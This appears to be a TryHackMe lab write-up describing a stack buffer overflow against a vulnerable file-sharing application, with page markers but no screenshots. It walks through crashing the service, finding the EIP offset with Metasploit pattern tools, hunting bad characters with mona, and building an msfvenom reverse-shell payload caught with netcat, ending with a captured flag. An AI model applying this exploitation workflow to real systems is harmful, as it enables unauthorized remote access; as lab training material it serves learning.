Professional Documents
Culture Documents
Buffer Overflow BOF - E2: Testing Organization
Buffer Overflow BOF - E2: Testing Organization
Buffer Overflow BOF - E2: Testing Organization
BOF_E2
Tester’s Name
M S V S Pavan
TryHackme ID
pavanmsvs
Test Date
10/07/2021
Our purpose of this testing was to find vulnerability in the given application and using the vulnerability gain user
access.
Nmap used to check at which port the application is running. Msfvenom to create payload metasploit-
framework tool to find offset value, pattern-creation.
From nmap scan we can see that port 8888 is open and our application is running on that port. We are already
provided with a skeleton of the code we have to use that skeleton and modify it to gain user access. From other
port at bin directory we got the vulnerable application, downloaded it and transferred it to our testing machine
where we will test our code and try to gain user access
Page 2
Page 3
We got the Skelton from the TryHackMe
Now, Extract the downloaded zip file into the windows system and start the application
Page 4
EXPLOITING THE TARGET
Now will start our testing in local development system by using the skeleton
Use the skeleton just modified the IP as shown with that of my local testing system. Now start and application
and run the crash.py to see whether the application is crashed or not
Page 5
As the application crashed from 6000 “A” sent to it will create a pattern of that and will try crash attack once
more with our pattern to get the offset value
For this will have to use metasploit tool pattern_create.rb this script will create a random char pattern of the
length specified by us.
/usr/share/metasploit-framework/tools/exploitpattern_create.rb -l 500
Now will put this pattern character in place of “A” in our skeleton
Now we created the code with our pattern of 500 length and will execute this to get the offset value (exact
crash point of the application).
Page 6
After executing our code we see that we got EIP value which will use to find the offset of the application, and at
ESP address we can see our pattern is seen. For finding the offset we will use another metasploit tool
pattern_offset.rb this will give the application offset value.
As seen above using the EIP value we found the offset of the application which is 146.. Now will use this value in
our code to control the EIP
Will use the skeleton with the offset value in it and pass “B” extra character to get EIP control.
Page 7
As seen at EIP we got our extra passed character’s ASCII value i.e. 42424242. AS we have controlled the EIP will
now find the bad character in the application. For this will use the built in Mona module of immunity debugger.
Will configure a log folder first and then will create a bytearray using Mona module
Page 8
Once we created the bad character using mona will copy this in our code and execute it
We can simply add this as bad and add to buffer or we can pass it as buff value after the given value of skeleton.
Once we execute our code we will get the bad character present in the application which we have to remove.
We got the ESP value and using mona module we will compare the bytearray.bin file
Page 9
!mona compare -f c:\logs\minishare\bytearray.bin –a 032638D0
For finding the bad character we used this mona command and have to see the proper ESP value in register. We
can see that it saying corruption after 1 byte will remove first character from the bytearray and again execute
the code. To remove the first bad character form log will use mona command
Similarly will remove the bad character from our code as well and will execute to see if any other bad character
present in our code
Page 10
Page 11
We can see that it saying corruption after 0 bytes will remove that character from the bytearray and again
execute the code. To remove the bad character form log will use mona command.
Similarly will remove the bad character from our code as well and will execute to see if any other bad character
present in our code
Page 12
On executing our code after removing the bad character we again compare it using mona command and we find
that the status is unmodified which means our application don’t have any more bad character
If we try directly we are unable to find the JMP ESP value using mona modules but in the TryHackMe they gave
a hint
Page 13
Now we are set to create our payload using msfvenom to gain user control and get the shell access of the
testing system.
- b --> bad character to be removed from our payload copying this buf value in our code and changing it as per
the skeleton provided, and adding the ESP value and NOPs padding. Padding = "\x90" * 16.
Page 14
Now before executing this code will have to open listener at port 4444 which we gave as lport in our payload
using net cat to get the shell
Page 15
On executing our shell code got the local system shell thus we successfully created a shell code which gave the
local system access now will create payload for the THM machine as we are connected with VPN will use tun0 ip
in payload and change the target IP in our code.
Page 16
Page 17
Minishare_proof.txt flag: - BD87238361767F91DB548CD0FD8CA8A09BB664E5A
We successfully got user access of the system and got the flag, Submitted the flag in THM
Page 18
Page 19